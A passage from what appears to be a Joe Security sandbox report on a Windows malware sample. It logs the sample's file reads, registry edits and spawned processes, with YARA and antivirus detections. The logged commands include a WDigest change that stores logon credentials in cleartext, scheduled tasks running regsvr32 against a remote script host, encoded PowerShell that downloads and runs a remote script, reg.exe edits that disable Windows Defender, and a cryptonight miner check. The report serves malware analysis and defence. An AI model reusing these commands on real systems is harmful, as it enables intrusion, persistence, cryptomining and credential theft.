C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.dll unknown 4096 success or wait 1 6CA69FDE unknown C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.dll unknown 512 success or wait 1 6CA69FDE unknown C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.dll unknown 512 success or wait 1 6CA69FDE unknown C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.dll unknown 512 success or wait 1 6CA69FDE unknown C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.dll unknown 512 success or wait 1 6CA69FDE unknown unknown unknown 4096 success or wait 3 17E08E7 ReadFile unknown unknown 4096 pipe broken 2 17E08E7 ReadFile C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.U unknown 4096 success or wait 1 6CA69FDE unknown tility\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.U unknown 512 success or wait 1 6CA69FDE unknown tility\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.U unknown 512 success or wait 1 6CA69FDE unknown tility\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.U unknown 512 success or wait 1 6CA69FDE unknown tility\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.U unknown 512 success or wait 1 6CA69FDE unknown tility\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll C:\Windows\System32\csrss.exe unknown 4096 success or wait 2 17E08E7 ReadFile C:\Windows\System32\csrss.exe unknown 4096 success or wait 2 17E08E7 ReadFile C:\Windows\System32\csrss.exe unknown 4096 end of file 2 17E08E7 ReadFile C:\Windows\System32\csrss.exe unknown 4096 end of file 4 17E08E7 ReadFile C:\Windows\System32\csrss.exe unknown 4096 end of file 2 17E08E7 ReadFile C:\Windows\System32\wininit.exe unknown 4096 success or wait 1 17E08E7 ReadFile C:\Windows\System32\wininit.exe unknown 4096 success or wait 23 17E08E7 ReadFile C:\Windows\System32\wininit.exe unknown 4096 end of file 1 17E08E7 ReadFile C:\Windows\System32\wininit.exe unknown 4096 end of file 2 17E08E7 ReadFile C:\Windows\System32\wininit.exe unknown 4096 end of file 1 17E08E7 ReadFile C:\Windows\System32\winlogon.exe unknown 4096 success or wait 1 17E08E7 ReadFile C:\Windows\System32\winlogon.exe unknown 4096 success or wait 74 17E08E7 ReadFile C:\Windows\System32\winlogon.exe unknown 4096 end of file 1 17E08E7 ReadFile C:\Windows\System32\winlogon.exe unknown 4096 end of file 2 17E08E7 ReadFile C:\Windows\System32\winlogon.exe unknown 4096 end of file 1 17E08E7 ReadFile C:\Windows\System32\services.exe unknown 4096 success or wait 1 17E08E7 ReadFile C:\Windows\System32\services.exe unknown 4096 success or wait 62 17E08E7 ReadFile C:\Windows\System32\services.exe unknown 4096 end of file 1 17E08E7 ReadFile C:\Windows\System32\services.exe unknown 4096 end of file 2 17E08E7 ReadFile C:\Windows\System32\services.exe unknown 4096 end of file 1 17E08E7 ReadFile C:\Windows\System32\lsass.exe unknown 4096 success or wait 1 17E08E7 ReadFile C:\Windows\System32\lsass.exe unknown 4096 success or wait 5 17E08E7 ReadFile C:\Windows\System32\lsass.exe unknown 512 end of file 1 17E08E7 ReadFile

Copyright Joe Security LLC 2018 Page 38 of 50 Source File Path Offset Length Completion Count Address Symbol C:\Windows\System32\lsass.exe unknown 4096 end of file 1 17E08E7 ReadFile C:\Windows\System32\lsass.exe unknown 4096 end of file 1 17E08E7 ReadFile C:\Windows\System32\lsm.exe unknown 4096 success or wait 1 17E08E7 ReadFile C:\Windows\System32\lsm.exe unknown 4096 success or wait 65 17E08E7 ReadFile C:\Windows\System32\lsm.exe unknown 512 end of file 1 17E08E7 ReadFile C:\Windows\System32\lsm.exe unknown 4096 end of file 1 17E08E7 ReadFile C:\Windows\System32\lsm.exe unknown 4096 end of file 1 17E08E7 ReadFile C:\Windows\System32\svchost.exe unknown 4096 success or wait 10 17E08E7 ReadFile C:\Windows\System32\svchost.exe unknown 4096 success or wait 50 17E08E7 ReadFile C:\Windows\System32\svchost.exe unknown 4096 end of file 10 17E08E7 ReadFile C:\Windows\System32\svchost.exe unknown 4096 end of file 10 17E08E7 ReadFile C:\Windows\System32\spoolsv.exe unknown 4096 success or wait 1 17E08E7 ReadFile C:\Windows\System32\spoolsv.exe unknown 4096 success or wait 76 17E08E7 ReadFile C:\Windows\System32\spoolsv.exe unknown 4096 success or wait 1 17E08E7 ReadFile C:\Windows\System32\spoolsv.exe unknown 4096 end of file 1 17E08E7 ReadFile C:\Windows\System32\spoolsv.exe unknown 4096 end of file 2 17E08E7 ReadFile C:\Windows\System32\spoolsv.exe unknown 4096 end of file 1 17E08E7 ReadFile C:\Windows\System32\dwm.exe unknown 4096 success or wait 1 17E08E7 ReadFile C:\Windows\System32\dwm.exe unknown 4096 success or wait 22 17E08E7 ReadFile C:\Windows\System32\dwm.exe unknown 512 end of file 1 17E08E7 ReadFile C:\Windows\System32\dwm.exe unknown 4096 end of file 1 17E08E7 ReadFile C:\Windows\System32\dwm.exe unknown 4096 end of file 1 17E08E7 ReadFile unknown unknown 4096 pipe broken 2 17E08E7 ReadFile C:\Windows\System32\dllhost.exe unknown 4096 success or wait 1 17E08E7 ReadFile C:\Windows\System32\dllhost.exe unknown 4096 success or wait 1 17E08E7 ReadFile C:\Windows\System32\dllhost.exe unknown 4096 end of file 1 17E08E7 ReadFile C:\Windows\System32\dllhost.exe unknown 4096 end of file 2 17E08E7 ReadFile C:\Windows\System32\dllhost.exe unknown 4096 end of file 1 17E08E7 ReadFile C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe unknown 4096 success or wait 1 17E08E7 ReadFile C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe unknown 4096 success or wait 26 17E08E7 ReadFile C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe unknown 888 end of file 1 17E08E7 ReadFile C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe unknown 4096 end of file 1 17E08E7 ReadFile C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe unknown 4096 end of file 1 17E08E7 ReadFile C:\Windows\System32\wbem\WmiPrvSE.exe unknown 4096 success or wait 3 17E08E7 ReadFile C:\Windows\System32\wbem\WmiPrvSE.exe unknown 4096 success or wait 186 17E08E7 ReadFile C:\Windows\System32\wbem\WmiPrvSE.exe unknown 512 end of file 3 17E08E7 ReadFile C:\Windows\System32\wbem\WmiPrvSE.exe unknown 4096 end of file 3 17E08E7 ReadFile C:\Windows\System32\wbem\WmiPrvSE.exe unknown 4096 end of file 3 17E08E7 ReadFile C:\Windows\System32\msiexec.exe unknown 4096 success or wait 1 17E08E7 ReadFile C:\Windows\System32\msiexec.exe unknown 4096 success or wait 17 17E08E7 ReadFile C:\Windows\System32\msiexec.exe unknown 512 end of file 1 17E08E7 ReadFile C:\Windows\System32\msiexec.exe unknown 4096 end of file 1 17E08E7 ReadFile C:\Windows\System32\msiexec.exe unknown 4096 end of file 1 17E08E7 ReadFile C:\Windows\System32\conhost.exe unknown 4096 success or wait 4 17E08E7 ReadFile C:\Windows\System32\conhost.exe unknown 4096 success or wait 264 17E08E7 ReadFile C:\Windows\System32\conhost.exe unknown 4096 end of file 4 17E08E7 ReadFile C:\Windows\System32\conhost.exe unknown 4096 end of file 8 17E08E7 ReadFile C:\Windows\System32\conhost.exe unknown 4096 end of file 4 17E08E7 ReadFile C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe unknown 4096 success or wait 3 17E08E7 ReadFile C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe unknown 4096 success or wait 321 17E08E7 ReadFile C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe unknown 4096 success or wait 3 17E08E7 ReadFile C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe unknown 4096 success or wait 6 17E08E7 ReadFile C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe unknown 4096 end of file 3 17E08E7 ReadFile C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe unknown 4096 end of file 6 17E08E7 ReadFile C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe unknown 4096 end of file 3 17E08E7 ReadFile C:\Windows\System32\wbem\WmiApSrv.exe unknown 4096 success or wait 1 17E08E7 ReadFile C:\Windows\System32\wbem\WmiApSrv.exe unknown 4096 success or wait 33 17E08E7 ReadFile C:\Windows\System32\wbem\WmiApSrv.exe unknown 4096 end of file 1 17E08E7 ReadFile C:\Windows\System32\wbem\WmiApSrv.exe unknown 4096 end of file 2 17E08E7 ReadFile C:\Windows\System32\wbem\WmiApSrv.exe unknown 4096 end of file 1 17E08E7 ReadFile C:\Windows\System32\taskeng.exe unknown 4096 success or wait 1 17E08E7 ReadFile C:\Windows\System32\taskeng.exe unknown 4096 success or wait 45 17E08E7 ReadFile C:\Windows\System32\taskeng.exe unknown 4096 success or wait 1 17E08E7 ReadFile

Copyright Joe Security LLC 2018 Page 39 of 50 Source File Path Offset Length Completion Count Address Symbol C:\Windows\System32\taskeng.exe unknown 512 end of file 1 17E08E7 ReadFile C:\Windows\System32\taskeng.exe unknown 4096 end of file 1 17E08E7 ReadFile C:\Windows\System32\taskeng.exe unknown 4096 end of file 1 17E08E7 ReadFile C:\Windows\System32\regsvr32.exe unknown 4096 success or wait 2 17E08E7 ReadFile C:\Windows\System32\regsvr32.exe unknown 4096 success or wait 6 17E08E7 ReadFile C:\Windows\System32\regsvr32.exe unknown 512 end of file 2 17E08E7 ReadFile C:\Windows\System32\regsvr32.exe unknown 4096 end of file 2 17E08E7 ReadFile C:\Windows\System32\regsvr32.exe unknown 4096 end of file 2 17E08E7 ReadFile C:\Windows\System32\cmd.exe unknown 4096 success or wait 2 17E08E7 ReadFile C:\Windows\System32\cmd.exe unknown 4096 success or wait 146 17E08E7 ReadFile C:\Windows\System32\cmd.exe unknown 512 end of file 2 17E08E7 ReadFile C:\Windows\System32\cmd.exe unknown 4096 end of file 2 17E08E7 ReadFile C:\Windows\System32\cmd.exe unknown 4096 end of file 2 17E08E7 ReadFile C:\Windows\System32\reg.exe unknown 4096 success or wait 2 17E08E7 ReadFile C:\Windows\System32\reg.exe unknown 4096 success or wait 30 17E08E7 ReadFile C:\Windows\System32\reg.exe unknown 4096 end of file 2 17E08E7 ReadFile C:\Windows\System32\reg.exe unknown 4096 end of file 4 17E08E7 ReadFile C:\Windows\System32\reg.exe unknown 4096 end of file 2 17E08E7 ReadFile

Registry Activities

Source Key Path Completion Count Address Symbol

Key Value Created

Source Key Path Name Type Data Completion Count Address Symbol HKEY_LOCAL_MACHINE\SYSTEM\Cont UseLogonCredential dword 1 success or wait 1 17E54B2 RegSetValueExW rolSet001\Control\SecurityProviders\WDigest

Analysis Process: netsh.exe PID: 3436 Parent PID: 3268

General

Start time: 05:05:56 Start date: 04/09/2018 Path: C:\Windows\System32\netsh.exe Wow64 process (32bit): false Commandline: 'C:\Windows\system32\netsh.exe' ipsec static add policy name=netbc Imagebase: 0x1360000 File size: 96256 bytes MD5 hash: 784A50A6A09C25F011C3143DDD68E729 Has administrator privileges: true Programmed in: C, C++ or other language Reputation: moderate

Registry Activities

Source Key Path Completion Count Address Symbol

Source Key Path Name Type Data Completion Count Address Symbol

Analysis Process: netsh.exe PID: 3464 Parent PID: 3268

General

Start time: 05:05:57

Copyright Joe Security LLC 2018 Page 40 of 50 Start date: 04/09/2018 Path: C:\Windows\System32\netsh.exe Wow64 process (32bit): false Commandline: 'C:\Windows\system32\netsh.exe' ipsec static add filterlist name=block Imagebase: 0x1360000 File size: 96256 bytes MD5 hash: 784A50A6A09C25F011C3143DDD68E729 Has administrator privileges: true Programmed in: C, C++ or other language Reputation: moderate

Analysis Process: netsh.exe PID: 3484 Parent PID: 3268

General

Start time: 05:05:57 Start date: 04/09/2018 Path: C:\Windows\System32\netsh.exe Wow64 process (32bit): false Commandline: 'C:\Windows\system32\netsh.exe' ipsec static add filteraction name=block action=block Imagebase: 0x1360000 File size: 96256 bytes MD5 hash: 784A50A6A09C25F011C3143DDD68E729 Has administrator privileges: true Programmed in: C, C++ or other language Reputation: moderate

Analysis Process: netsh.exe PID: 3512 Parent PID: 3268

General

Start time: 05:05:58 Start date: 04/09/2018 Path: C:\Windows\System32\netsh.exe Wow64 process (32bit): false Commandline: 'C:\Windows\system32\netsh.exe' ipsec static add filter filterlist=block any srcmask=32 s rcport=0 dstaddr=me dstport=445 protocol=tcp description=445 Imagebase: 0x1360000 File size: 96256 bytes MD5 hash: 784A50A6A09C25F011C3143DDD68E729 Has administrator privileges: true Programmed in: C, C++ or other language Reputation: moderate

Analysis Process: netsh.exe PID: 3548 Parent PID: 3268

General

Start time: 05:05:59 Start date: 04/09/2018 Path: C:\Windows\System32\netsh.exe Wow64 process (32bit): false Commandline: 'C:\Windows\system32\netsh.exe' ipsec static add rule name=block policy=netbc filterlist= block filteraction=block Imagebase: 0x1360000 File size: 96256 bytes MD5 hash: 784A50A6A09C25F011C3143DDD68E729 Has administrator privileges: true Programmed in: C, C++ or other language Copyright Joe Security LLC 2018 Page 41 of 50 Reputation: moderate

Analysis Process: netsh.exe PID: 3592 Parent PID: 3268

General

Start time: 05:06:00 Start date: 04/09/2018 Path: C:\Windows\System32\netsh.exe Wow64 process (32bit): false Commandline: 'C:\Windows\system32\netsh.exe' ipsec static set policy name=netbc assign=y Imagebase: 0x1360000 File size: 96256 bytes MD5 hash: 784A50A6A09C25F011C3143DDD68E729 Has administrator privileges: true Programmed in: C, C++ or other language Reputation: moderate

Analysis Process: schtasks.exe PID: 3780 Parent PID: 3268

General

Start time: 05:06:13 Start date: 04/09/2018 Path: C:\Windows\System32\schtasks.exe Wow64 process (32bit): false Commandline: 'C:\Windows\system32\schtasks.exe' /create /tn WindowsLogTasks /tr 'regsvr32 /u /s /i:htt p://update.7h4uk.com:443/antivirus.php scrobj.dll' /sc onstart /ru System /F Imagebase: 0x250000 File size: 179712 bytes MD5 hash: 2003E9B15E1C502B146DAD2E383AC1E3 Has administrator privileges: true Programmed in: C, C++ or other language Reputation: moderate

Analysis Process: schtasks.exe PID: 3796 Parent PID: 3268

General

Start time: 05:06:14 Start date: 04/09/2018 Path: C:\Windows\System32\schtasks.exe Wow64 process (32bit): false Commandline: 'C:\Windows\system32\schtasks.exe' /create /tn 'System Log Security Check' /tr 'regsvr32 /u /s /i:http://update.7h4uk.com:443/antivirus.php scrobj.dll' /sc minute /mo 20 /ru System /F Imagebase: 0x250000 File size: 179712 bytes MD5 hash: 2003E9B15E1C502B146DAD2E383AC1E3 Has administrator privileges: true Programmed in: C, C++ or other language Reputation: moderate

Analysis Process: schtasks.exe PID: 3808 Parent PID: 3268

General

Copyright Joe Security LLC 2018 Page 42 of 50 Start time: 05:06:14 Start date: 04/09/2018 Path: C:\Windows\System32\schtasks.exe Wow64 process (32bit): false Commandline: 'C:\Windows\system32\schtasks.exe' /delete /tn yastcat /f Imagebase: 0x250000 File size: 179712 bytes MD5 hash: 2003E9B15E1C502B146DAD2E383AC1E3 Has administrator privileges: true Programmed in: C, C++ or other language Reputation: moderate

Analysis Process: taskeng.exe PID: 3816 Parent PID: 848

General

Start time: 05:26:00 Start date: 04/09/2018 Path: C:\Windows\System32\taskeng.exe Wow64 process (32bit): false Commandline: taskeng.exe {639D9766-C719-4F35-A71E-727C31918952} S-1-5-18:NT AUTHORI TY\System:Service: Imagebase: 0x150000 File size: 192000 bytes MD5 hash: 4F2659160AFCCA990305816946F69407 Has administrator privileges: true Programmed in: C, C++ or other language Reputation: moderate

Analysis Process: powercfg.exe PID: 3828 Parent PID: 3268

General

Start time: 05:26:00 Start date: 04/09/2018 Path: C:\Windows\System32\powercfg.exe Wow64 process (32bit): false Commandline: 'C:\Windows\system32\powercfg.exe' /CHANGE -standby-timeout-ac 0 Imagebase: 0x3d0000 File size: 59392 bytes MD5 hash: 98E7E971AB21A6EDD2323C0FB37B9A0F Has administrator privileges: true Programmed in: C, C++ or other language Reputation: low

Analysis Process: powercfg.exe PID: 3840 Parent PID: 3268

General

Start time: 05:26:00 Start date: 04/09/2018 Path: C:\Windows\System32\powercfg.exe Wow64 process (32bit): false Commandline: 'C:\Windows\system32\powercfg.exe' /CHANGE -hibernate-timeout-ac 0 Imagebase: 0x3d0000 File size: 59392 bytes MD5 hash: 98E7E971AB21A6EDD2323C0FB37B9A0F Has administrator privileges: true

Copyright Joe Security LLC 2018 Page 43 of 50 Programmed in: C, C++ or other language Reputation: low

Analysis Process: regsvr32.exe PID: 3876 Parent PID: 3816

General

Start time: 05:26:01 Start date: 04/09/2018 Path: C:\Windows\System32\regsvr32.exe Wow64 process (32bit): false Commandline: C:\Windows\system32\regsvr32.EXE /u /s /i:http://update.7h4uk.com:443/antivirus.php scrobj .dll Imagebase: 0xbf0000 File size: 14848 bytes MD5 hash: 432BE6CF7311062633459EEF6B242FB5 Has administrator privileges: true Programmed in: C, C++ or other language Reputation: moderate

Analysis Process: powercfg.exe PID: 3892 Parent PID: 3268

General

Start time: 05:26:02 Start date: 04/09/2018 Path: C:\Windows\System32\powercfg.exe Wow64 process (32bit): false Commandline: 'C:\Windows\system32\powercfg.exe' -SetAcValueIndex 381b4222-f694-41f0-9685-ff5 bb260df2e 4f971e89-eebd-4455-a8de-9e59040e7347 5ca83367-6e45-459f-a27b-476b1d01c 936 000 Imagebase: 0x3d0000 File size: 59392 bytes MD5 hash: 98E7E971AB21A6EDD2323C0FB37B9A0F Has administrator privileges: true Programmed in: C, C++ or other language Reputation: low

Analysis Process: regsvr32.exe PID: 3884 Parent PID: 3816

General

Start time: 05:26:02 Start date: 04/09/2018 Path: C:\Windows\System32\regsvr32.exe Wow64 process (32bit): false Commandline: C:\Windows\system32\regsvr32.EXE /u /s /i:http://update.7h4uk.com:443/antivirus.php scrobj .dll Imagebase: 0xbf0000 File size: 14848 bytes MD5 hash: 432BE6CF7311062633459EEF6B242FB5 Has administrator privileges: true Programmed in: C, C++ or other language Reputation: moderate

Analysis Process: NETSTAT.EXE PID: 3900 Parent PID: 3268

Copyright Joe Security LLC 2018 Page 44 of 50 General

Start time: 05:26:02 Start date: 04/09/2018 Path: C:\Windows\System32\NETSTAT.EXE Wow64 process (32bit): false Commandline: 'C:\Windows\system32\NETSTAT.EXE' -anop tcp Imagebase: 0xf30000 File size: 27136 bytes MD5 hash: 32297BB17E6EC700D0FC869F9ACAF561 Has administrator privileges: true Programmed in: C, C++ or other language Reputation: moderate

Analysis Process: csc.exe PID: 3968 Parent PID: 3268

General

Start time: 05:26:11 Start date: 04/09/2018 Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe Wow64 process (32bit): false Commandline: 'C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe' /noconfig /fullpaths @'C:\Users\us er\AppData\Local\Temp\06trmcfr.cmdline' Imagebase: 0x400000 File size: 77960 bytes MD5 hash: 0A1C81BDCB030222A0B0A652B2C89D8D Has administrator privileges: true Programmed in: C, C++ or other language Reputation: moderate

Analysis Process: NETSTAT.EXE PID: 4004 Parent PID: 3268

General

Start time: 05:26:11 Start date: 04/09/2018 Path: C:\Windows\System32\NETSTAT.EXE Wow64 process (32bit): false Commandline: 'C:\Windows\system32\NETSTAT.EXE' -anop tcp Imagebase: 0xc60000 File size: 27136 bytes MD5 hash: 32297BB17E6EC700D0FC869F9ACAF561 Has administrator privileges: true Programmed in: C, C++ or other language Reputation: moderate

Analysis Process: cmd.exe PID: 4040 Parent PID: 3876

General

Start time: 05:26:12 Start date: 04/09/2018 Path: C:\Windows\System32\cmd.exe Wow64 process (32bit): false Commandline: 'C:\Windows\System32\cmd.exe' /c powershell.exe -nop -noni -w hidden -enc SQBFAF gAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYw BsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoAC cAaAB0AHQAcAA6AC8ALwAxADgANQAuADEAMgA4AC4ANAAzAC4ANgAyAC8AZQ BvAHAALgBwAHMAMQAnACkAKQAKAA== Copyright Joe Security LLC 2018 Page 45 of 50 Imagebase: 0x4a510000 File size: 302592 bytes MD5 hash: AD7B9C14083B52BC532FBA5948342B98 Has administrator privileges: true Programmed in: C, C++ or other language Reputation: high

Analysis Process: powershell.exe PID: 1828 Parent PID: 4040

General

Start time: 05:26:13 Start date: 04/09/2018 Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Wow64 process (32bit): false Commandline: powershell.exe -nop -noni -w hidden -enc SQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAG MAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbA BvAGEAZABzAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADgANQAuAD EAMgA4AC4ANAAzAC4ANgAyAC8AZQBvAHAALgBwAHMAMQAnACkAKQAKAA== Imagebase: 0x21e10000 File size: 452608 bytes MD5 hash: 92F44E405DB16AC55D97E3BFE3B132FA Has administrator privileges: true Programmed in: .Net C# or VB.NET Yara matches: Rule: PowerShell_Susp_Parameter_Combo, Description: Detects PowerShell invocation with suspicious parameters, Source: 00000019.00000002.1929086913.000B4000.00000004.sdmp, Author: Florian Roth Rule: PowerShell_Susp_Parameter_Combo, Description: Detects PowerShell invocation with suspicious parameters, Source: 00000019.00000002.1928783139.00090000.00000004.sdmp, Author: Florian Roth Reputation: high

Analysis Process: cmd.exe PID: 2120 Parent PID: 3884

General

Start time: 05:26:13 Start date: 04/09/2018 Path: C:\Windows\System32\cmd.exe Wow64 process (32bit): false Commandline: 'C:\Windows\System32\cmd.exe' /c powershell.exe -nop -noni -w hidden -enc SQBFAF gAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYw BsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoAC cAaAB0AHQAcAA6AC8ALwAxADgANQAuADEAMgA4AC4ANAAzAC4ANgAyAC8AZQ BvAHAALgBwAHMAMQAnACkAKQAKAA== Imagebase: 0x4a510000 File size: 302592 bytes MD5 hash: AD7B9C14083B52BC532FBA5948342B98 Has administrator privileges: true Programmed in: C, C++ or other language Reputation: high

Analysis Process: powershell.exe PID: 2216 Parent PID: 2120

General

Start time: 05:26:15 Start date: 04/09/2018 Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Wow64 process (32bit): false

Copyright Joe Security LLC 2018 Page 46 of 50 Commandline: powershell.exe -nop -noni -w hidden -enc SQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAG MAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbA BvAGEAZABzAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADgANQAuAD EAMgA4AC4ANAAzAC4ANgAyAC8AZQBvAHAALgBwAHMAMQAnACkAKQAKAA== Imagebase: 0x21e10000 File size: 452608 bytes MD5 hash: 92F44E405DB16AC55D97E3BFE3B132FA Has administrator privileges: true Programmed in: .Net C# or VB.NET Yara matches: Rule: PowerShell_Susp_Parameter_Combo, Description: Detects PowerShell invocation with suspicious parameters, Source: 0000001C.00000002.1931665079.000B4000.00000004.sdmp, Author: Florian Roth Rule: PowerShell_Susp_Parameter_Combo, Description: Detects PowerShell invocation with suspicious parameters, Source: 0000001C.00000002.1931632180.00090000.00000004.sdmp, Author: Florian Roth Reputation: high

Analysis Process: reg.exe PID: 2504 Parent PID: 1828

General

Start time: 05:26:16 Start date: 04/09/2018 Path: C:\Windows\System32\reg.exe Wow64 process (32bit): false Commandline: 'C:\Windows\system32\reg.exe' add 'HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microso ft\Windows Defender' /v DisableAntiSpyware /t REG_DWORD /d 1 /f Imagebase: 0xef0000 File size: 62464 bytes MD5 hash: D69A9ABBB0D795F21995C2F48C1EB560 Has administrator privileges: true Programmed in: C, C++ or other language Reputation: moderate

Analysis Process: reg.exe PID: 2656 Parent PID: 1828

General

Start time: 05:26:18 Start date: 04/09/2018 Path: C:\Windows\System32\reg.exe Wow64 process (32bit): false Commandline: 'C:\Windows\system32\reg.exe' add 'HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microso ft\Windows Defender\Real-Time Protection' /v DisableBehaviorMonitoring /t REG_DWORD /d 1 /f Imagebase: 0xef0000 File size: 62464 bytes MD5 hash: D69A9ABBB0D795F21995C2F48C1EB560 Has administrator privileges: true Programmed in: C, C++ or other language

Analysis Process: reg.exe PID: 2660 Parent PID: 1828

General

Start time: 05:26:20 Start date: 04/09/2018 Path: C:\Windows\System32\reg.exe Wow64 process (32bit): false Commandline: 'C:\Windows\system32\reg.exe' add 'HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microso ft\Windows Defender\Real-Time Protection' /v DisableOnAccessProtection /t REG_DWORD /d 1 /f Copyright Joe Security LLC 2018 Page 47 of 50 Imagebase: 0xef0000 File size: 62464 bytes MD5 hash: D69A9ABBB0D795F21995C2F48C1EB560 Has administrator privileges: true Programmed in: C, C++ or other language

Analysis Process: cohernece.exe PID: 2664 Parent PID: 3268

General

Start time: 05:26:24 Start date: 04/09/2018 Path: C:\Users\user\AppData\Local\Temp\cohernece.exe Wow64 process (32bit): false Commandline: C:\Users\HERBBL~1\AppData\Local\Temp\cohernece.exe Imagebase: 0x400000 File size: 1827440 bytes MD5 hash: 4FE2DE6FBB278E56C23E90432F21F6C8 Has administrator privileges: true Programmed in: Borland Delphi Yara matches: Rule: ZxShell_Related_Malware_CN_Group_Jul17_2, Description: Detects a ZxShell related sample from a CN threat group, Source: 00000020.00000003.1893324898.00310000.00000040.sdmp, Author: Florian Roth Rule: Backdoor_Nitol_Jun17, Description: Detects malware backdoor Nitol - file wyawou.exe - Attention: this rule also matches on Upatre Downloader, Source: 00000020.00000003.1893324898.00310000.00000040.sdmp, Author: Florian Roth Rule: CN_disclosed_20180208_Mal1, Description: Detects malware from disclosed CN malware set, Source: 00000020.00000003.1893324898.00310000.00000040.sdmp, Author: Florian Roth Antivirus matches: Detection: 100%, Avira, Browse Detection: 74%, virustotal, Browse

Analysis Process: findstr.exe PID: 2324 Parent PID: 3268

General

Start time: 05:26:25 Start date: 04/09/2018 Path: C:\Windows\System32\findstr.exe Wow64 process (32bit): false Commandline: 'C:\Windows\system32\findstr.exe' /i /m /c:cryptonight c:\windows\explorer.exe Imagebase: 0xf20000 File size: 62976 bytes MD5 hash: 18F02C555FBC9885DF9DB77754D6BB9B Has administrator privileges: true Programmed in: C, C++ or other language

Analysis Process: reg.exe PID: 1396 Parent PID: 1828

General

Start time: 05:26:26 Start date: 04/09/2018 Path: C:\Windows\System32\reg.exe Wow64 process (32bit): false Commandline: 'C:\Windows\system32\reg.exe' add 'HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microso ft\Windows Defender\Real-Time Protection' /v DisableScanOnRealtimeEnable /t REG_ DWORD /d 1 /f Imagebase: 0xef0000 File size: 62464 bytes MD5 hash: D69A9ABBB0D795F21995C2F48C1EB560

Copyright Joe Security LLC 2018 Page 48 of 50 Has administrator privileges: true Programmed in: C, C++ or other language

Analysis Process: cohernece.exe PID: 1340 Parent PID: 2664

General

Start time: 05:26:26 Start date: 04/09/2018 Path: C:\Users\user\AppData\Local\Temp\cohernece.exe Wow64 process (32bit): false Commandline: C:\Users\HERBBL~1\AppData\Local\Temp\cohernece.exe Imagebase: 0x400000 File size: 1827440 bytes MD5 hash: 4FE2DE6FBB278E56C23E90432F21F6C8 Has administrator privileges: true Programmed in: C, C++ or other language Yara matches: Rule: ZxShell_Related_Malware_CN_Group_Jul17_2, Description: Detects a ZxShell related sample from a CN threat group, Source: 00000023.00000001.1900742410.00400000.00000040.sdmp, Author: Florian Roth Rule: Backdoor_Nitol_Jun17, Description: Detects malware backdoor Nitol - file wyawou.exe - Attention: this rule also matches on Upatre Downloader, Source: 00000023.00000001.1900742410.00400000.00000040.sdmp, Author: Florian Roth Rule: CN_disclosed_20180208_Mal1, Description: Detects malware from disclosed CN malware set, Source: 00000023.00000001.1900742410.00400000.00000040.sdmp, Author: Florian Roth Rule: ZxShell_Related_Malware_CN_Group_Jul17_2, Description: Detects a ZxShell related sample from a CN threat group, Source: 00000023.00000000.1793672754.00400000.00000040.sdmp, Author: Florian Roth Rule: Backdoor_Nitol_Jun17, Description: Detects malware backdoor Nitol - file wyawou.exe - Attention: this rule also matches on Upatre Downloader, Source: 00000023.00000000.1793672754.00400000.00000040.sdmp, Author: Florian Roth Rule: CN_disclosed_20180208_Mal1, Description: Detects malware from disclosed CN malware set, Source: 00000023.00000000.1793672754.00400000.00000040.sdmp, Author: Florian Roth

Analysis Process: findstr.exe PID: 756 Parent PID: 3268

General

